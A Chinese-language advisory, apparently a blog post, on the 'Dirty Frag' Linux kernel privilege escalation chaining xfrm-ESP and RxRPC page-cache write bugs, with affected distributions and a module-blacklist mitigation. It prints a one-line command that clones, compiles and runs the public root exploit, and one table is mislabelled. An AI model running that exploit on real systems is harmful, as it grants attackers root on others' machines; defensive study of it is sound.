2026年5月,安全研究员 Hyunwoo Kim (@v4bel) 公开披露了一类名为 Dirty Frag 的Linux内核漏洞。该漏洞通过链式组合两个独立的页缓存写入漏洞,可在主流Linux发行版上实现本地权限提升(LPE),从普通用户直接获取 root 权限。Dirty Frag 属于与著名漏洞 Dirty Pipe 和 Copy Fail 同源的漏洞类别。其核心特点是:- 通用性强:覆盖 Ubuntu、RHEL、Fedora、CentOS 等主流发行版
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

参考地址:https://github.com/V4bel/dirtyfrag
核心概念:sk_buff 与页缓存
Linux内核网络子系统使用 struct sk_buff(socket buffer)来管理网络数据包。该结构体中的 frag 成员用于存储数据片段,涉及页缓存机制。 页缓存是内核将磁盘文件内容缓存在内存中的机制,多个进程可通过页缓存共享同一物理页面。当攻击者能越权修改页缓存内容,就能间接篡改磁盘上只读文件的内容——这正是 Dirty Pipe 的攻击思路。两个组合漏洞
Dirty Frag 链式利用了两个独立的页缓存写入漏洞:xfrm-ESP 页缓存写入漏洞(CVE-2026-43284)
属性 | 详情 |
引入时间 | 2023-06(commit 2dc334f1a63a) |
漏洞模块 | rxrpc.ko(RxRPC协议实现) |
前置条件 | 无需 namespace 权限 |
原理:RxRPC 是一种远程过程调用协议,其内核实现在处理 sk_buff 时存在类似的页缓存写入缺陷。该漏洞不要求用户命名空间权限,弥补了 xfrm-ESP 漏洞在 AppArmor 限制环境下的短板。
为什么需要链式组合?
漏洞 | 引入版本 | 存续时间 |
CVE-2026-43284(xfrm-ESP) | 2017-01-17 起 | 约 9 年 |
CVE-2026-43500(RxRPC) | 2023-06 起 | 约 3 年 |
已验证受影响的发行版:• Ubuntu 24.04.4(6.17.0-23-generic) • RHEL 10.1(6.12.0-124.49.1.el10_1.x86_64) • openSUSE Tumbleweed(7.0.2-1-default) • CentOS Stream 10(6.12.0-224.el10.x86_64) • AlmaLinux 10(6.12.0-124.52.3.el10_1.x86_64) • Fedora 44(6.19.14-300.fc44.x86_64) ...更多发行版待验证
移除漏洞模块 + 清理页缓存sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责。